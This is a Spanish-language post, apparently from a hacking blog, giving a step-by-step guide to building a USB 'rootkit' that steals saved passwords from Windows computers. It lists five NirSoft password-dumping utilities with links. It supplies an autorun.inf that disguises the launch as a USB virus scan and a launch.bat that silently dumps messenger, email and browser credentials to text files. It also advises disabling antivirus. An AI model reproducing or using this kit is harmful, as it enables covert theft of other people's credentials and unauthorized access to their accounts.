El conocimiento es libre, la información no.

Robar password's con USB



Recuperar contraseñas guardadas en Windows desde un USB drive (Flash)

Como todos sabemos, Windows guarda la mayoría de contraseñas que son usadas a diario, incluyendo contraseñas de Mensajeria Instantánea como MSN, Yahoo, AOL, Windows Messenger etc. Junto con estos, Windows también guarda las contraseñas de cuentas de Outlook Express, SMTP, POP (correo), FTP y contraseñas de autocompetado de muchos navegadores como IE y Firefox. Existen varias herramientas para "recuperar" estas contraseñas de los lugares donde han sido guardadas. Usando estas herramientas y un USB.

Nuestros Software's que necesitaremos son los siguientes....

MessenPass
Recupera las contraseñas de la mayoría de programas de mensajería instantánea:
MSN Messenger
Windows Messenger (Windows XP)
Windows Live Messenger (Windows XP/Vista/7)
Yahoo Messenger (Versiones 5.x and 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger v4.6 o anterior, AIM 6.x, y AIM Pro.
Trillian
Trillian Astra
Miranda
GAIM/Pidgin
MySpace IM
PaltalkScene
Digsby

Link http://www.nirsoft.net/utils/mspass.html


Mail PassView
Recupera las contraseñas de los siguientes programas de email: 
Outlook Express
Microsoft Outlook 2000 (POP3 and SMTP)
Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP y SMTP)
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x (si la contraseña no ha sido encriptada con contraseña maestra)
Mozilla Thunderbird (si la contraseña no ha sido encriptada con contraseña maestra
Group Mail Free
Yahoo! Mail - si la contraseña es guardada en la aplicación Yahoo! Messenger.
Hotmail/MSN mail - si la contraseña es guardada en la aplicación MSN/Windows/Live Messenger.
Gmail - si la contraseña es guardada por la aplicación de notificación de Gmail, Google Desktop, o por Google Talk.

Por cada cuenta de email, los siguientes campos son mostrados: nombre de la cuenta, aplicación, email, servidor, tipo de servidor (POP3/IMAP/SMTP), nombre de usuario y contraseña.

Link http://www.nirsoft.net/utils/mailpv.html


IE PassView
Es una utilidad pequeña que revela las contraseñas guardadas por el navegador Internet Explore. Soporta todas las versiones de IE desde la 4.0 hasta la 9.0 

Link http://www.nirsoft.net/utils/internet_explorer_password.html



Protected Storage PassView
Recupera todas las contraseñas guardadas dentro del almacenaje protegido, incluyendo las contraseñas de auto completar de IE, las contraseñas de sitios protegidos por contraseña, contraseñas de MSN Explorer, y más...

Link http://www.nirsoft.net/utils/pspv.html



PasswordFox 
Nos permite mirar los nombres de usuarios y contraseñas guardadas por Mozilla Firefox. Muestra: indice del registro, pagina web, nombre de usuario, contraseña, campo de nombre de usuario, campo de contraseña y nombre del archivo.

Link http://www.nirsoft.net/utils/passwordfox.html


Acá el procedimiento paso a paso para crear nuestro toolkit 

NOTA: tienes que cerrar tu antivirus antes de seguir estos pasos pero sino deseas no importa =).


1. Descarga todas las 5 herramientas, extraelas y copia a tu USB solamente los archivos ejecutables (.exe)
Copia los archivos mspass.exe, mailpv.exe, iepv.exe, pspv.exe y passwordfox.exe a tu USB 

2. Crea un documento nuevo en Notepad (libreta de notas) y escribe el siguiente texto:


 [autorun]
   open=launch.bat
   ACTION= Buscar virus en el dispositivo USB

Guarda el archivo como autorun.inf
Ahora copia el archivo autorun.inf a tu USB 

3. Crea otro documento en Notepad y escribe lo siguiente:


start mspass.exe /stext mspass.txt 
  start mailpv.exe /stext mailpv.txt 
  start iepv.exe /stext iepv.txt   start pspv.exe /stext pspv.txt   start passwordfox.exe /stext passwordfox.txt

Guarda el archivo como launch.bat
Copia el archivo launch.bat a tu USB 

¡Ahora nuestro Rootkit esta listo para hackear contraseñas! 
Puedes usar tu USB para hackear contraseñas guardadas en cualquier computador Windows con estos pasos:

1. Conecta tu memoria USB y el autorun abrirá una ventana (porque hemos creado una USB autoejecutable).

2. En la ventana que se abrió, elige la primera opción (Buscar virus en el dispositivo USB).

3. Ahora todas las herramientas de recuperación de contraseñas se ejecutaran silenciosamente en el fondo (este proceso dura apenas segundos). Las contraseñas se almacenaran en los archivos .TXT

4. Remover la memoria USB y podremos ver las contraseñas almacenadas en los archivos .TXT

Esto funciona con Windows 2000, XP, Vista y 7

Quedaría así




SDK - > El conocimiento es libre.